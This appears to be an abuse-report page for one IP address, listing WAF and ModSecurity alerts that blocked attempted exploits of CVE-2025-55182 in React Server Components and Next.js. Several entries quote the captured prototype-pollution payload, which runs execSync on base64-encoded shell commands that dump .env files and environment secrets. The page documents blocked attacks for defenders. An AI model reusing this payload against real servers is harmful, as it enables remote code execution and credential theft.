IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478)
show less
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) MV:{\\"then\\":\\"$1:__proto__:then\\",\\"status\\":\\"resolved_model\\",\\"reason\\":-1,\\"value\\":\\"{\\\\\\"then\\\\\\":\\\\\\"$B1337\\\\\\"}\\",\\"_response\\":{\\"_prefix\\":\\"var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKTsgZWNobyAnPT09RE9URU5WPT09JzsgY2F0IC5lbnYgLmVudi5sb2NhbCAuZW52LnByb2R1Y3Rpb24gLmVudi5kZXZlbG9wbWVudCAuZW52LnN0YWdpbmcgLmVudi5iYWNrdXAgLi4vLmVudiAuLi8uLi8uZW52IDI L2Rldi9udWxsOyBlY2hvICc9PT1QUklOVEVOVj09PSc7IHByaW50ZW52IDI L2Rldi9udWxsIHwgZ3JlcCAtaUUgJyhTTVRQfE1BSUx8QVdTfEFQSXxTRUNSRVR8S0VZfFNFTkR8UEFTU1dPUkR8VE9LRU58REFUQUJBU0V8TU9OR098UkVESVN8UE9TVEdSRVN8TVlTUUwpJyB8IGhlYWQgLTgwOyBlY2hvICc9PT1QUk9DRU5WPT09JzsgZm9yIHAgaW4gL3Byb2MvWzAtOV0qL2Vudmlyb247IGRvICAgY2F0ICIkcCIgMj4vZGV2L251bGwgfCB0ciAnXDAnICdcbicgfCAgIGdyZXAg
show less
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478)
show less
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478)
show less
Automated security incident from hosting server. ModSecurity blocked suspicious request targeting UR ...
show moreAutomated security incident from hosting server. ModSecurity blocked suspicious request targeting URI: / (Rule ID: 920450) - HTTP header is restricted by policy (/x-middleware-subrequest/)
show less
Automated security incident from hosting server. ModSecurity blocked suspicious request targeting UR ...
show moreAutomated security incident from hosting server. ModSecurity blocked suspicious request targeting URI: / (Rule ID: 920450) - HTTP header is restricted by policy (/x-middleware-subrequest/)
show less
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478)
show less
IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ...
show moreIM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478)
show less
[SunApr1208:01:39.2435342026][security2:error][pid3326072:tid3326086][client54.156.190.38:0]ModSecur ...
show more[SunApr1208:01:39.2435342026][security2:error][pid3326072:tid3326086][client54.156.190.38:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostnam
show less
[SatApr1109:55:15.2372762026][security2:error][pid1787849:tid1787935][client54.156.190.38:0]ModSecur ...
show more[SatApr1109:55:15.2372762026][security2:error][pid1787849:tid1787935][client54.156.190.38:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostnam
show less
Port Scan
Brute-Force
Web App Attack
Showing 1 to
15
of 20 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ